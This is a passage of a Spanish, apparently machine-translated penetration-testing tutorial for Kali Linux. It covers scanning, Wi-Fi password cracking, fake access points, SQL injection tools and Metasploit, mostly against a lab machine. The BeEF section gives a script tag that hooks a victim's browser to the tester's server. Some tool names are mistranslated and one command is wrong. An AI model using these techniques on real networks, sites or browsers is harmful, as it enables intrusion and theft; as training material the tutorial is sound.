Вы находитесь на странице: 1из 131

Contenido

Kali Linux - Inicio


Instalación y configuración
Herramientas de recopilación de información
Herramientas de análisis de vulnerabilidad
Kali Linux - Ataques inalámbricos
Prueba de penetración del sitio web
Kali Linux - Herramientas de explotación
Kali Linux - Herramientas forenses
Kali Linux - Ingeniería social
Kali Linux - Herramientas de estrés
Kali Linux - Sniffing & Spoofing
Kali Linux - Herramientas para descifrar
contraseñas
Kali Linux: mantenimiento del acceso
Kali Linux - Ingeniería inversa
Kali Linux - Herramientas de informes
Kali Linux - Instalación y configuración
Kali Linux es uno de los mejores paquetes de seguridad de un hacker ético,
que contiene un conjunto de herramientas divididas por categorías. Es de
código abierto y su página web oficial es https://www.kali.org.
En general, Kali Linux se puede instalar en una máquina como un sistema
operativo, como una máquina virtual, que discutiremos en la siguiente
sección. Instalar Kali Linux es una opción práctica, ya que proporciona más
opciones para trabajar y combinar las herramientas. También puede crear un
CD de arranque en vivo o USB. Todo esto se puede encontrar en el siguiente
enlace: https://www.kali.org/downloads/
BackTrack era la versión anterior de la distribución Kali Linux. La última
versión es Kali 2016.1 y se actualiza con mucha frecuencia.

Para instalar Kali Linux:

 Primero, descargaremos el cuadro virtual y lo instalaremos.


 Más tarde, descargaremos e instalaremos la distribución Kali Linux.

Descargue e instale la caja virtual


Un Virtual Box es particularmente útil cuando quieres probar algo en Kali Linux
del que no estás seguro. Ejecutar Kali Linux en una Virtual Box es seguro
cuando quieres experimentar con paquetes desconocidos o cuando quieres
probar un código.
Con la ayuda de un Virtual Box, puede instalar Kali Linux en su sistema (no
directamente en su disco duro) junto con su sistema operativo principal, que
puede ser MAC o Windows u otro tipo de Linux.
Comprendamos cómo puede descargar e instalar Virtual Box en su sistema.
Paso 1: para descargar, vaya
a https://www.virtualbox.org/wiki/Downloads . Dependiendo de su sistema
operativo, seleccione el paquete correcto. En este caso, será el primero para
Windows como se muestra en la siguiente captura de pantalla.

Paso 2 - Haz clic en Siguiente .

Paso 3 : la página siguiente le dará opciones para elegir la ubicación donde


desea instalar la aplicación. En este caso, dejémoslo como predeterminado y
haga clic en Siguiente .
www.postparaprogramadores.com
/
Paso 4 : haz clic en Siguiente y aparecerá la siguiente captura de pantalla
de Configuración personalizada . Seleccione las funciones que desea
instalar y haga clic en Siguiente.

Paso 5 - Haz clic en Sí para continuar con la instalación.


Paso 6 : aparece la pantalla Listo para instalar . Haga clic en instalar.

Paso 7 - Haz clic en el botón Finalizar .


La aplicación Virtual Box ahora se abrirá como se muestra en la siguiente
captura de pantalla. Ahora estamos listos para instalar el resto de los hosts
para este manual y esto también se recomienda para uso profesional.
Síguenos en Instagram para que estés al tanto de los
nuevos libros de programación. Click aqui

Instalar Kali Linux


Ahora que hemos instalado con éxito la Virtual Box, pasemos al siguiente paso
e instale Kali Linux.
Paso 1 : descargue el paquete Kali Linux de su sitio web
oficial: https://www.kali.org/downloads/

Paso 2 - Haz clic en VirtualBox → Nuevo como se muestra en la siguiente


captura de pantalla.
Paso 3 : elija el archivo de disco duro virtual correcto y haga clic en Abrir .

Paso 4 : aparece la siguiente captura de pantalla. Haz clic en el botón Crear .


Paso 5 : inicia el sistema operativo Kali. El nombre de usuario predeterminado
es root y la contraseña es toor .
Update Kali
Es importante seguir actualizando Kali Linux y sus herramientas a las nuevas
versiones, para permanecer funcional. Los siguientes son los pasos para
actualizar Kali.
Paso 1 - Ve a Aplicación → Terminal. Luego, escriba "apt-get update" y la
actualización se realizará como se muestra en la siguiente captura de pantalla.
Paso 2 : ahora para actualizar las herramientas, escriba "apt-get upgrade" y
se descargarán los nuevos paquetes.

Paso 3 : le preguntará si desea continuar. Escriba "Y" y "Enter" .


Paso 4 : para actualizar a una versión más reciente del sistema operativo,
escriba "apt-get distupgrade" .

Configuración de laboratorio
En esta sección, configuraremos otra máquina de prueba para realizar las
pruebas con la ayuda de las herramientas de Kali Linux.
Paso 1 : descargue Metasploitable , que es una máquina Linux. Se puede
descargar desde la página web oficial
de Rapid7 : https://information.rapid7.com/metasploitabledownload.html?LS=1
631875&CS=web
Paso 2 : regístrese proporcionando sus datos. Después de completar el
formulario anterior, podemos descargar el software.

Paso 3 - Haz clic en VirtualBox → Nuevo .


Paso 4 : haga clic en "Usar un archivo de disco duro virtual
existente" . Explore el archivo donde descargó Metasploitable y haga clic
en Abrir .

Paso 5 : aparece una pantalla para crear una máquina virtual. Haga clic en
"Crear".
El nombre de usuario predeterminado es msfadmin y la contraseña
es msfadmin .
Kali Linux - Herramientas de recopilación de
información
En este capítulo, discutiremos las herramientas de recopilación de información
de Kali Linux.

NMAP y ZenMAP
NMAP y ZenMAP son herramientas útiles para la fase de escaneo de piratería
ética en Kali Linux. NMAP y ZenMAP son prácticamente la misma
herramienta, sin embargo, NMAP usa la línea de comandos mientras ZenMAP
tiene una GUI.
NMAP es una herramienta de utilidad gratuita para el descubrimiento de redes
y la auditoría de seguridad. Muchos administradores de sistemas y redes
también lo encuentran útil para tareas como el inventario de la red, la
administración de los horarios de actualización del servicio y la supervisión del
tiempo de actividad del host o del servicio.
NMAP utiliza paquetes IP sin procesar de formas novedosas para determinar
qué hosts están disponibles en la red, qué servicios (nombre y versión de la
aplicación) están ofreciendo esos hosts, qué sistemas operativos (y versiones
de SO) están ejecutando, qué tipo de filtros de paquetes / firewalls están en
uso, etc.
Ahora, vamos paso a paso y aprendamos cómo usar NMAP y ZenMAP.
Paso 1 : para abrir, vaya a Aplicaciones → 01-Recopilación de información →
nmap o zenmap.
Paso 2 : el siguiente paso es detectar el tipo / versión del sistema operativo
del host de destino. Según la ayuda indicada por NMAP, el parámetro de
detección de tipo / versión del sistema operativo es la variable "-O". Para
obtener más información, use este enlace: https://nmap.org/book/man-os-
detection.html
El comando que usaremos es -
nmap -O 192.168.1.101
La siguiente captura de pantalla muestra dónde debe escribir el comando
anterior para ver la salida de Nmap:
Paso 3 - A continuación, abre los puertos TCP y UDP. Para escanear todos
los puertos TCP basados en NMAP, use el siguiente comando:
nmap -p 1-65535 -T4 192.168.1.101
Donde el parámetro "–p" indica todos los puertos TCP que deben ser
escaneados. En este caso, estamos escaneando todos los puertos y “-T4” es
la velocidad de escaneo a la que NMAP tiene que correr.
Los siguientes son los resultados. En verde están todos los puertos TCP
abiertos y en rojo están todos los puertos cerrados. Sin embargo, NMAP no se
muestra ya que la lista es demasiado larga.
Escaneo Stealth
El escaneo oculto o SYN también se conoce como escaneo medio abierto ,
ya que no completa el protocolo de enlace de tres vías TCP. Un hacker envía
un paquete SYN al objetivo; si se recibe una trama SYN / ACK, se supone que
el objetivo completará la conexión y que el puerto está escuchando. Si se
recibe un RST desde el destino, se supone que el puerto no está activo o está
cerrado.
Ahora para ver el escaneo SYN en la práctica, use el parámetro –sS en
NMAP. El siguiente es el comando completo:
nmap -sS -T4 192.168.1.101
La siguiente captura de pantalla muestra cómo usar este comando:
Searchsploit
Searchsploit es una herramienta que ayuda a los usuarios de Kali Linux a
buscar directamente con la línea de comando desde el archivo de base de
datos Exploit.
Para abrirlo, vaya a Aplicaciones → 08-Herramientas de explotación →
searchsploit, como se muestra en la siguiente captura de pantalla.
Después de abrir la terminal, escriba " nombre de índice de exploit de
searchsploit ".

Herramientas DNS
En esta sección, aprenderemos cómo usar algunas herramientas de DNS que
Kali ha incorporado. Básicamente, estas herramientas ayudan en
transferencias de zona o problemas de resolución de IP de dominio.

dnsenum.pl

La primera herramienta es dnsenum.pl, que es un script PERL que ayuda a


que MX, A y otros registros se conecten a un dominio.
Haga clic en el terminal en el panel izquierdo.
Escriba "nombre de dominio dnsenum" y se mostrarán todos los
registros. En este caso, muestra los registros A.
DNSMAP

La segunda herramienta es DNSMAP, que ayuda a encontrar los números de


teléfono, contactos y otros subdominios conectados a este dominio, que
estamos buscando. El siguiente es un ejemplo.
Haga clic en el terminal como en la sección superior, luego escriba "nombre
de dominio dnsmap"
dnstracer

La tercera herramienta es dnstracer , que determina de dónde un servidor de


nombres de dominio (DNS) obtiene su información para un nombre de host
dado.
Haga clic en el terminal como en la sección superior, luego escriba "nombre
de dominio dnstracer" .

Herramientas LBD
Las herramientas LBD (Detector de equilibrio de carga) son muy interesantes,
ya que detectan si un dominio determinado utiliza el equilibrio de carga DNS y
/ o HTTP. Es importante porque si tiene dos servidores, uno u otro puede no
actualizarse y puede intentar explotarlo. Los siguientes son los pasos para
usarlo:
Primero, haga clic en el terminal en el panel izquierdo.
Luego, escriba "lbd domainname" . Si produce un resultado como
"ENCONTRADO", significa que el servidor tiene un equilibrio de carga. En
este caso, el resultado es "NO ENCONTRADO".

Hping3
Hping3 es ampliamente utilizado por hackers éticos. Es casi similar a las
herramientas de ping, pero es más avanzado, ya que puede omitir el filtro de
firewall y usar los protocolos TCP, UDP, ICMP y RAW-IP. Tiene un modo
traceroute y la capacidad de enviar archivos entre un canal cubierto.
Haga clic en el terminal en el panel izquierdo.
Escriba "hping3 –h" que mostrará cómo utilizar este comando.

El otro comando es "dominio hping3 o parámetro IP"


Kali Linux - Herramientas de análisis de
vulnerabilidad
En este capítulo, aprenderemos cómo usar algunas de las herramientas que
nos ayudan a explotar dispositivos o aplicaciones para obtener acceso.

Herramientas de Cisco
Kali tiene algunas herramientas que pueden usarse para explotar el enrutador
Cisco. Una de esas herramientas es Cisco-torch, que se utiliza para escaneo
masivo, huellas digitales y explotación.
Abramos la consola de Terminal haciendo clic en el panel izquierdo.
Luego, escriba “cisco-torch –parámetro IP del host” y si no se encuentra
nada que explotar, se mostrará el siguiente resultado.

Para ver cuáles son los parámetros que se pueden usar, escriba "cisco-
torch?"

Herramienta de auditoría de Cisco


Es un script PERL, que escanea los enrutadores Cisco en busca de
vulnerabilidades comunes. Para usarlo, abra nuevamente la terminal en el
panel izquierdo como se muestra en la sección anterior y escriba "CAT –h
nombre de host o IP" .
Puede agregar el parámetro de puerto "-p" como se muestra en la siguiente
captura de pantalla, que en este caso es 23 para forzarlo por fuerza bruta.

Explotador global de Cisco


Cisco Global Exploiter (CGE) es una herramienta de prueba de seguridad
avanzada, simple y rápida. Con estas herramientas, puede realizar varios tipos
de ataques como se muestra en la siguiente captura de pantalla. Sin embargo,
tenga cuidado al realizar pruebas en un entorno en vivo, ya que algunos de
ellos pueden bloquear el dispositivo Cisco. Por ejemplo, la opción puede
detener los servicios.

Para utilizar esta herramienta, escriba “cge.pl IPaddress número de


vulnerabilidad”
La siguiente captura de pantalla muestra el resultado de la prueba realizada
en el enrutador Cisco para la vulnerabilidad número 3 de la lista anterior. El
resultado muestra que la vulnerabilidad fue explotada con éxito.
CAMA
BED es un programa diseñado para verificar demonios para posibles
desbordamientos de búfer, cadenas de formato, etc. Alabama.

En este caso, probaremos la máquina de prueba con IP 192.168.1.102 y el


protocolo HTTP.
El comando será "bed –s HTTP –t 192.168.1.102" y las pruebas continuarán.
Kali Linux - Ataques inalámbricos
En este capítulo, aprenderemos cómo usar las herramientas de craqueo de
Wi-Fi que Kali Linux ha incorporado. Sin embargo, es importante que la tarjeta
inalámbrica que tenga sea compatible con el modo de monitoreo.

Galleta Wifi Helecho


Fern Wifi cracker es una de las herramientas que Kali tiene para descifrar
redes inalámbricas.
Antes de abrir Fern, debemos convertir la tarjeta inalámbrica en modo de
monitoreo. Para hacer esto, escriba "airmon-ng start wlan-0" en el terminal.
Ahora, abre Fern Wireless Cracker.
Paso 1 - Aplicaciones → Haz clic en "Ataques inalámbricos" → "Fern Wireless
Cracker".

Paso 2 : seleccione la tarjeta inalámbrica como se muestra en la siguiente


captura de pantalla.
Paso 3 - Haz clic en "Buscar puntos de acceso".
Paso 4 : después de finalizar el escaneo, mostrará todas las redes
inalámbricas encontradas. En este caso, solo se encontraron "redes WPA".
Paso 5 : haz clic en redes WPA como se muestra en la captura de pantalla
anterior. Muestra toda la conexión inalámbrica encontrada. En general, en las
redes WPA, realiza ataques de diccionario como tal.
Paso 6 - Haz clic en "Examinar" y busca la lista de palabras para usar para el
ataque.

Paso 7 - Haz clic en "Ataque Wifi".


Paso 8 : después de finalizar el ataque del diccionario, encontró la contraseña
y se mostrará como se muestra en la siguiente imagen de captura de pantalla.

Kismet
Kismet es una herramienta de análisis de redes WIFI. Es un detector de red
inalámbrica 802.11 de capa 2, sniffer y sistema de detección de
intrusos. Funcionará con cualquier tarjeta inalámbrica que admita el modo de
monitoreo sin formato (rfmon) y pueda detectar el tráfico 802.11a / b / g /
n. Identifica las redes mediante la recopilación de paquetes y también redes
ocultas.
Para usarlo, ponga la tarjeta inalámbrica en modo de monitoreo y, para
hacerlo, escriba "airmon-ng start wlan-0" en el terminal.
Aprendamos a usar esta herramienta.
Paso 1 - Para iniciarlo, abra la terminal y escriba "kismet".

Paso 2 - Haz clic en "Aceptar".


Paso 3 - Haz clic en "Sí" cuando se te solicite iniciar Kismet Server. De lo
contrario, dejará de funcionar.

Paso 4 - Opciones de inicio, déjelo como predeterminado. Haga clic en


"Inicio".

Paso 5 : ahora mostrará una tabla pidiéndole que defina la tarjeta


inalámbrica. En tal caso, haga clic en Sí.
Paso 6 : en este caso, la fuente inalámbrica es "wlan0" . Tendrá que estar
escrito en la sección "Intf" → haga clic en "Agregar".

Paso 7 : comenzará a detectar las redes wifi como se muestra en la siguiente


captura de pantalla.
Paso 8 : haga clic en cualquier red, produce los detalles inalámbricos como se
muestra en la siguiente captura de pantalla.

GISKismet
GISKismet es una herramienta de visualización inalámbrica para representar
los datos recopilados utilizando Kismet de una manera práctica. GISKismet
almacena la información en una base de datos para que podamos consultar
datos y generar gráficos usando SQL. GISKismet actualmente usa SQLite
para la base de datos y GoogleEarth / KML para gráficos.
Aprendamos a usar esta herramienta.
Paso 1 - Para abrir GISKismet, vaya a: Aplicaciones → Haga clic en "Ataques
inalámbricos" → giskismet.

Como recordará en la sección anterior, utilizamos la herramienta Kismet para


explorar datos sobre redes inalámbricas y todos estos paquetes de datos
Kismet en archivos netXML.
Paso 2 : para importar este archivo a Giskismet, escriba "root @ kali: ~ #
giskismet -x Kismetfilename.netxml" y comenzará a importar los archivos.
Una vez importados, podemos importarlos a Google Earth los Hotspots que
encontramos antes.
Paso 3 : suponiendo que ya hayamos instalado Google Earth, hacemos clic en
Archivo → Abrir archivo creado por Giskismet → Haga clic en "Abrir".

Se mostrará el siguiente mapa.


Phisher fantasma
Ghost Phisher es una herramienta popular que ayuda a crear puntos de
acceso inalámbricos falsos y luego a crear Man-in-The-Middle-Attack.
Paso 1 : para abrirlo, haga clic en Aplicaciones → Ataques inalámbricos →
“phishing fantasma”.
Paso 2 : después de abrirlo, configuraremos el AP falso utilizando los
siguientes detalles.

 Entrada de interfaz inalámbrica: wlan0


 SSID: nombre de AP inalámbrico
 Dirección IP: IP que tendrá el AP
 WAP: contraseña que tendrá este SSID para conectarse
Paso 3 : haz clic en el botón Inicio .

Wifite
Es otra herramienta de bloqueo inalámbrica que ataca múltiples redes
encriptadas WEP, WPA y WPS seguidas.
En primer lugar, la tarjeta inalámbrica debe estar en modo de monitoreo.
Paso 1 : para abrirlo, vaya a Aplicaciones → Ataque inalámbrico → Wifite.
Paso 2 : escriba "wifite –showb" para buscar redes.
Paso 3 : para comenzar a atacar las redes inalámbricas, haga clic en Ctrl + C.

Paso 4 : escriba "1" para descifrar la primera conexión inalámbrica.

Paso 5 : después de completar el ataque, se encontrará la clave.

Kali Linux - Pruebas de penetración de sitios


web
En este capítulo, aprenderemos sobre las pruebas de penetración de sitios
web ofrecidas por Kali Linux.

Uso de Vega
Vega es un escáner gratuito y de código abierto y una plataforma de prueba
para probar la seguridad de las aplicaciones web. Vega puede ayudarlo a
encontrar y validar la inyección SQL, la secuencia de comandos entre sitios
(XSS), la información confidencial revelada inadvertidamente y otras
vulnerabilidades. Está escrito en Java, basado en GUI, y se ejecuta en Linux,
OS X y Windows.
Vega incluye un escáner automático para pruebas rápidas y un proxy
interceptor para inspección táctica. Vega puede ampliarse utilizando una
potente API en el lenguaje de la web: JavaScript. La página web oficial
es https://subgraph.com/vega/
Paso 1 : para abrir Vega, vaya a Aplicaciones → 03-Análisis de aplicaciones
web → Vega

Paso 2 : si no ve una aplicación en la ruta, escriba el siguiente comando.

Paso 3 : para iniciar un análisis, haga clic en el signo "+".


Paso 4 : ingrese la URL de la página web que se escaneará. En este caso, es
una máquina metasploitable → haga clic en "Siguiente".
Paso 5 : marque todas las casillas de los módulos que desea controlar. Luego,
haga clic en "Siguiente".
Paso 6 - Haz clic en "Siguiente" nuevamente en la siguiente captura de
pantalla.
Paso 7 - Haz clic en "Finalizar".
Paso 8 : si aparece la siguiente tabla, haga clic en "Sí".

El escaneo continuará como se muestra en la siguiente captura de pantalla.


Paso 9 : una vez completado el escaneo, en el panel izquierdo hacia abajo
puede ver todos los resultados, que se clasifican según la gravedad. Si hace
clic en él, verá todos los detalles de las vulnerabilidades en el panel derecho,
como "Solicitud", "Discusión", "Impacto" y "Remediación".

ZapProxy
ZAP-OWASP Zed Attack Proxy es una herramienta de prueba de penetración
integrada fácil de usar para encontrar vulnerabilidades en aplicaciones
web. Es una interfaz Java.
Paso 1 : para abrir ZapProxy, vaya a Aplicaciones → 03-Análisis de
aplicaciones web → owaspzap.

Paso 2 - Haz clic en "Aceptar".


ZAP comenzará a cargarse.

Paso 3 : elija una de las opciones como se muestra en la siguiente captura de


pantalla y haga clic en "Inicio".
La siguiente web es metasploitable con IP: 192.168.1.101
Paso 4 : ingrese la URL de la web de prueba en “URL para atacar” → haga
clic en “Atacar”.

Una vez completado el escaneo, en el panel superior izquierdo verá todos los
sitios rastreados.
En el panel izquierdo "Alertas", verá todos los resultados junto con la
descripción.
Paso 5 - Haz clic en "Araña" y verás todos los enlaces escaneados.

Uso de herramientas de base de datos


sqlmap

sqlmap es una herramienta de prueba de penetración de código abierto que


automatiza el proceso de detección y explotación de fallas de inyección SQL y
toma de control de los servidores de bases de datos. Viene con un potente
motor de detección, muchas funciones de nicho para el último probador de
penetración y una amplia gama de interruptores que duran desde la toma de
huellas digitales de la base de datos, la obtención de datos de la base de
datos, hasta el acceso al sistema de archivos subyacente y la ejecución de
comandos en el sistema operativo a través de conexiones fuera de banda.
Aprendamos a usar sqlmap.
Paso 1 : para abrir sqlmap, vaya a Aplicaciones → 04-Evaluación de la base
de datos → sqlmap.
La página web que tiene parámetros vulnerables a la inyección SQL es
metasploitable.

Paso 2 : para comenzar la prueba de inyección sql, escriba "sqlmap - u URL


de la víctima"

Paso 3 : a partir de los resultados, verá que algunas variables son


vulnerables.
sqlninja

sqlninja es una inyección de SQL en Microsoft SQL Server a un acceso GUI


completo. sqlninja es una herramienta destinada a explotar vulnerabilidades
de inyección SQL en una aplicación web que utiliza Microsoft SQL Server
como back-end. La información completa sobre esta herramienta se puede
encontrar en http://sqlninja.sourceforge.net/
Paso 1 : para abrir sqlninja, vaya a Aplicaciones → 04-Base de datos de
evaluación → sqlninja.
Herramientas de escaneo CMS
WPScan

WPScan es un escáner de vulnerabilidad de WordPress de caja negra que se


puede utilizar para escanear instalaciones remotas de WordPress para
encontrar problemas de seguridad.
Paso 1 : para abrir WPscan, vaya a Aplicaciones → 03-Análisis de
aplicaciones web → “wpscan”.
Aparece la siguiente captura de pantalla.

Paso 2 : para analizar vulnerabilidades en un sitio web, escriba "wpscan –u


URL de la página web" .
Si el escáner no se actualiza, le pedirá que lo actualice. Te recomendaré
hacerlo.

Una vez que comience la exploración, verá los resultados. En la siguiente


captura de pantalla, las vulnerabilidades se indican con una flecha roja.
Joomscan

Joomla es probablemente el CMS más utilizado debido a su flexibilidad. Para


este CMS, es un escáner de Joomla. Ayudará a los desarrolladores web y
maestros web a ayudar a identificar posibles debilidades de seguridad en sus
sitios de Joomla implementados.
Paso 1 : para abrirlo, simplemente haga clic en el panel izquierdo en la
terminal, luego en "joomscan - parameter" .
Paso 2 : para obtener ayuda para el tipo de uso "joomscan /?"

Paso 3 : para iniciar el análisis, escriba "joomscan –u URL de la víctima".

Los resultados se mostrarán como se muestra en la siguiente captura de


pantalla.
Herramientas de escaneo SSL
TLSSLed es un script de shell de Linux utilizado para evaluar la seguridad de
una implementación de servidor web SSL / TLS (HTTPS) de destino. Se basa
en sslscan, un exhaustivo escáner SSL / TLS que se basa en la biblioteca
openssl y en la herramienta de línea de comandos "openssl s_client" .
Las pruebas actuales incluyen verificar si el objetivo es compatible con el
protocolo SSLv2, el cifrado NULL, los cifrados débiles en función de su
longitud de clave (40 o 56 bits), la disponibilidad de cifrados seguros (como
AES), si el certificado digital está firmado con MD5 y las capacidades actuales
de renegociación SSL / TLS.
Para comenzar a probar, abra una terminal y escriba "tlssled URL
port" . Comenzará a probar el certificado para encontrar datos.

Puede ver en el hallazgo que el certificado es válido hasta 2018 como se


muestra en verde en la siguiente captura de pantalla.
w3af
w3af es un marco de ataque y auditoría de aplicaciones web que tiene como
objetivo identificar y explotar todas las vulnerabilidades de las aplicaciones
web. Este paquete proporciona una interfaz gráfica de usuario (GUI) para el
marco. Si solo desea una aplicación de línea de comandos, instale w3af-
console.
El marco se ha denominado "metasploit para la web", pero en realidad es
mucho más, ya que también descubre las vulnerabilidades de las aplicaciones
web utilizando técnicas de escaneo de recuadro negro. El núcleo w3af y sus
complementos están completamente escritos en Python. El proyecto tiene más
de 130 complementos, que identifican y explotan la inyección de SQL, las
secuencias de comandos entre sitios (XSS), la inclusión remota de archivos y
más.
Paso 1 : para abrirlo, vaya a Aplicaciones → 03-Análisis de aplicaciones web
→ Haga clic en w3af.

Paso 2 : en el "Destino", ingrese la URL de la víctima, que en este caso será


una dirección web metasploitable.
Paso 3 - Selecciona el perfil → Haz clic en "Inicio".

Paso 4 : vaya a "Resultados" y podrá ver el hallazgo con los detalles.


Kali Linux - Herramientas de explotación
En este capítulo, aprenderemos sobre las diversas herramientas de
explotación que ofrece Kali Linux.

Metasploit
Como mencionamos anteriormente, Metasploit es un producto de Rapid7 y la
mayoría de los recursos se pueden encontrar en su página
web www.metasploit.com . Está disponible en dos versiones: edición comercial
y gratuita. Las diferencias entre estas dos versiones no son muchas, por lo
tanto, en este caso usaremos la versión comunitaria (gratuita).
Como hacker ético, utilizará "Kali Ditribution", que tiene la versión de la
comunidad Metasploit integrada, junto con otras herramientas de hacking ético
que son muy cómodas al ahorrar tiempo de instalación. Sin embargo, si desea
instalarlo como una herramienta separada, es una aplicación que se puede
instalar en los sistemas operativos como Linux, Windows y OS X.
Primero, abra la Consola Metasploit en Kali. Luego, vaya a Aplicaciones →
Herramientas de explotación → Metasploit.
Después de que comience, verá la siguiente pantalla, donde la versión de
Metasploit está subrayada en rojo.
En la consola, si usas ayuda o? símbolo, le mostrará una lista con los
comandos de MSP junto con su descripción. Puede elegir según sus
necesidades y lo que utilizará.

Otro comando de administración importante es msfupdate, que ayuda a


actualizar el metaploit con los últimos exploits de vulnerabilidad. Después de
ejecutar este comando en la consola, deberá esperar varios minutos hasta que
se complete la actualización.
Tiene un buen comando llamado "Buscar" que puede utilizar para encontrar lo
que desea, como se muestra en la siguiente captura de pantalla. Por ejemplo,
quiero encontrar exploits relacionados con Microsoft y el comando puede
ser msf> nombre de búsqueda: tipo de Microsoft: exploit .
Donde "buscar" es el comando, "nombre" es el nombre del objeto que
estamos buscando, y "tipo" es el tipo de script que estamos buscando.

Otro comando es "información". Proporciona la información sobre un módulo o


plataforma donde se utiliza, quién es el autor, la referencia de vulnerabilidad y
la restricción de carga útil que esto puede tener.
Armitage
Armitage GUI para metasploit es una herramienta complementaria para
metasploit. Visualiza objetivos, recomienda exploits y expone las
características avanzadas de post-explotación.
Vamos a abrirlo, pero en primer lugar la consola de metasploit debe abrirse y
comenzar. Para abrir Armitage, vaya a Aplicaciones → Herramientas de
explotación → Armitage.
Haga clic en el botón Conectar , como se muestra en la siguiente captura de
pantalla.

Cuando se abra, verá la siguiente pantalla.


Armitage es fácil de usar. El área "Objetivos" enumera todas las máquinas que
ha descubierto y con las que está trabajando, los objetivos pirateados son de
color rojo con una tormenta eléctrica.
Después de hackear el objetivo, puede hacer clic derecho sobre él y continuar
explorando con lo que necesita hacer, como explorar (examinar) las carpetas.

En la siguiente GUI, verá la vista de las carpetas, que se llama


consola. Simplemente haciendo clic en las carpetas, puede navegar a través
de las carpetas sin la necesidad de comandos metasploit.
En el lado derecho de la GUI, hay una sección donde se enumeran los
módulos de vulnerabilidades.
Carne de vaca
BeEF son las siglas de Browser Exploitation Framework . Es una
herramienta de prueba de penetración que se centra en el navegador
web. BeEF permite al probador de penetración profesional evaluar la postura
de seguridad real de un entorno objetivo utilizando vectores de ataque del lado
del cliente.
Primero, debe actualizar el paquete Kali utilizando los siguientes comandos:
root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss
Para comenzar, use el siguiente comando:
root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef
Abra el navegador e ingrese el nombre de usuario y la contraseña: beef .

El enlace BeEF es un archivo JavaScript alojado en el servidor BeEF que


debe ejecutarse en los navegadores de los clientes. Cuando lo hace, vuelve a
llamar al servidor de BeEF para comunicar mucha información sobre el
objetivo. También permite ejecutar comandos y módulos adicionales contra el
objetivo. En este ejemplo, la ubicación del gancho BeEF está
en http://192.168.1.101:3000/hook.js .
Para atacar un navegador, incluya el enlace de JavaScript en una página que
verá el cliente. Hay varias formas de hacerlo, sin embargo, la más fácil es
insertar lo siguiente en una página y lograr que el cliente la abra.
<script src = "http://192.168.1.101:3000/hook.js" type =
"text/javascript"></script>
Una vez que se carga la página, regrese al Panel de control de BeEF y haga
clic en "Navegadores en línea" en la parte superior izquierda. Después de
unos segundos, debería ver la ventana emergente de su dirección IP que
representa un navegador conectado. Al pasar el mouse sobre la IP, se
proporcionará rápidamente información como la versión del navegador, el
sistema operativo y los complementos instalados.
Para ejecutar el comando de forma remota, haga clic en el host
"Propio". Luego, en el comando, haga clic en el módulo que desea ejecutar y
finalmente haga clic en "Ejecutar".

Linux Exploit Suggester


Sugiere posibles vulnerabilidades dada la versión de lanzamiento 'uname -
r' del sistema operativo Linux.
Para ejecutarlo, escriba el siguiente comando:
root@kali:/usr/share/linux-exploit-suggester#
./Linux_Exploit_Suggester.pl -k 3.0.0
3.0.0 es la versión del kernel del sistema operativo Linux que queremos
explotar.
Kali Linux - Herramientas forenses
En este capítulo, aprenderemos sobre las herramientas forenses disponibles
en Kali Linux.

p0f
p0f es una herramienta que puede identificar el sistema operativo de un host
de destino simplemente examinando los paquetes capturados incluso cuando
el dispositivo en cuestión está detrás de un firewall de paquetes. P0f no
genera tráfico de red adicional, directo o indirecto; sin búsquedas de
nombres; sin sondas misteriosas; sin consultas ARIN; nada. En manos de
usuarios avanzados, P0f puede detectar la presencia de firewall, el uso de
NAT y la existencia de equilibradores de carga.
Escriba "p0f - h" en el terminal para ver cómo usarlo y obtendrá los siguientes
resultados.
Enumerará incluso las interfaces disponibles.

Luego, escriba el siguiente comando: "p0f –i eth0 –p -o filename" .


Donde el parámetro "-i" es el nombre de la interfaz como se muestra arriba. "-
p" significa que está en modo promiscuo. "-o" significa que la salida se
guardará en un archivo.

Abra una página web con la dirección 192.168.1.2


A partir de los resultados, puede observar que el servidor web está usando
apache 2.xy el sistema operativo es Debian.

pdf-parser
pdf-parser es una herramienta que analiza un documento PDF para identificar
los elementos fundamentales utilizados en el archivo pdf analizado. No
representará un documento PDF. No se recomienda para el caso de libros de
texto para analizadores PDF, sin embargo, hace el trabajo. En general, esto se
usa para archivos pdf que sospecha que tienen una secuencia de comandos
incrustada.
El comando es -
pdf-parser -o 10 filepath
donde "-o" es el número de objetos.

Como puede ver en la siguiente captura de pantalla, el archivo pdf abre un


comando CMD.

Dumpzilla
La aplicación Dumpzilla está desarrollada en Python 3.xy tiene el propósito de
extraer toda la información forense interesante de los navegadores Firefox,
Iceweasel y Seamonkey para analizar.

ddrescue

Copia datos de un archivo o dispositivo de bloque (disco duro, cdrom, etc.) a


otro, tratando de rescatar las partes buenas primero en caso de errores de
lectura.
El funcionamiento básico de ddrescue es completamente automático. Es decir,
no tiene que esperar un error, detener el programa, reiniciarlo desde una
nueva posición, etc.
Si usa la función mapfile de ddrescue, los datos se rescatan de manera muy
eficiente (solo se leen los bloques necesarios). Además, puede interrumpir el
rescate en cualquier momento y reanudarlo más tarde en el mismo punto. El
mapfile es una parte esencial de la efectividad de ddrescue. Úselo a menos
que sepa lo que está haciendo.
La línea de comando es -
dd_rescue infilepath outfilepath
El parámetro "–v" significa detallado. "/ dev / sdb" es la carpeta a
rescatar. El archivo img es la imagen recuperada.

DFF
Es otra herramienta forense utilizada para recuperar los archivos. También
tiene una GUI. Para abrirlo, escriba "dff-gui" en el terminal y se abrirá la
siguiente GUI web.
Haga clic en Archivo → "Abrir evidencia".

Se abrirá la siguiente tabla. Marque "Formato sin formato" y haga clic en "+"
para seleccionar la carpeta que desea recuperar.
Luego, puede examinar los archivos a la izquierda del panel para ver qué se
ha recuperado.

Kali Linux - Ingeniería social


En este capítulo, aprenderemos sobre las herramientas de ingeniería social
utilizadas en Kali Linux.

Uso del kit de herramientas de ingeniería social


El Social-Engineer Toolkit (SET) es un marco de prueba de penetración de
código abierto diseñado para la ingeniería social. SET tiene una serie de
vectores de ataque personalizados que le permiten realizar un ataque creíble
en una fracción de tiempo. Este tipo de herramientas utilizan comportamientos
humanos para engañarlos a los vectores de ataque.
Aprendamos a usar el kit de herramientas de ingeniero social.
Paso 1 : para abrir SET, vaya a Aplicaciones → Herramientas de ingeniería
social → Haga clic en la herramienta de ingeniería social "SET".
Paso 2 : te preguntará si estás de acuerdo con los términos de
uso. Escriba "y" como se muestra en la siguiente captura de pantalla.

Paso 3 : la mayoría de los menús que se muestran en la siguiente captura de


pantalla se explican por sí mismos y, entre ellos, el más importante es el
número 1 "Ataques de ingeniería social".
